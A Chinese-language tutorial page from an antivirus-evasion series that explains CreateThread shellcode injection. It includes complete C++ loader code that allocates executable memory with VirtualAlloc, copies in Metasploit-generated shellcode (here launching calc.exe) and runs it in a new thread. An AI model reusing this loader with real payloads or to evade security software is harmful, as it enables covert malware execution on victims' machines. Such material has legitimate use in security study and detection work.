0-创建线程注入（CreateThread Injection）

Previous第二章-执行与注入技术 Next1-创建纤程注入（CreateFiber Injection）

Last updated 4 months ago

0-创建线程注入（CreateThread Injection）

一、前言

创建线程注入是最基础、最经典、最出名的一种注入方式，很多人刚开始学习免杀最先接触的注入方式就是创建线程注入，当然人怕出名猪怕壮，这也是杀软严密监控的一种注入方式。在前面我说过，shellcode的注入大致分为三步：

为shellcode分配内存
将shellcode移动到已分配的内存区域
执行shellcode

CreateThread是完成 执行shellcode 这一步骤的关键WindowsAPI，所以由此得名 创建线程注入。

相信读者很熟悉这种注入方式，因为在 第一章-基础 中大部分代码采用的是创建线程注入，因此在本小节中我不会过多说明实现细节，请读者参考前面的文章。

⚠注意：从本小节开始，我只用C++完成代码实现，如果有读者想要用C# 和Go实现，那么多注意WindowsAPI的参数类型。

二、流程

使用 VirtualAlloc 申请一块内存区域。官方文档：
使用 RtlMoveMemory 将shellcode移动到相应的内存区域。官方文档：
使用 CreateThread 创建一个线程执行指定位置的代码。官方文档：
使用 WaitForSingleObject 等待线程完成。官方文档：

三、代码实现

#include <Windows.h>

//将刚刚在msf中生成的calc的shellcode复制粘贴过来
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50"
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7"
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78"
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3"
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d"
"\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb"
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

int main() {

	// 申请一块大小为buf字节数组长度的可读可行的内存区域
	LPVOID pMemory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	// 将buf数组中的内容复制到刚刚分配的内存区域
	RtlMoveMemory(pMemory, buf, sizeof(buf));

	// 创建一个线程执行内存中的代码
	HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pMemory, NULL, 0, NULL);

	// 等待线程执行完成
	WaitForSingleObject(hThread, INFINITE);
}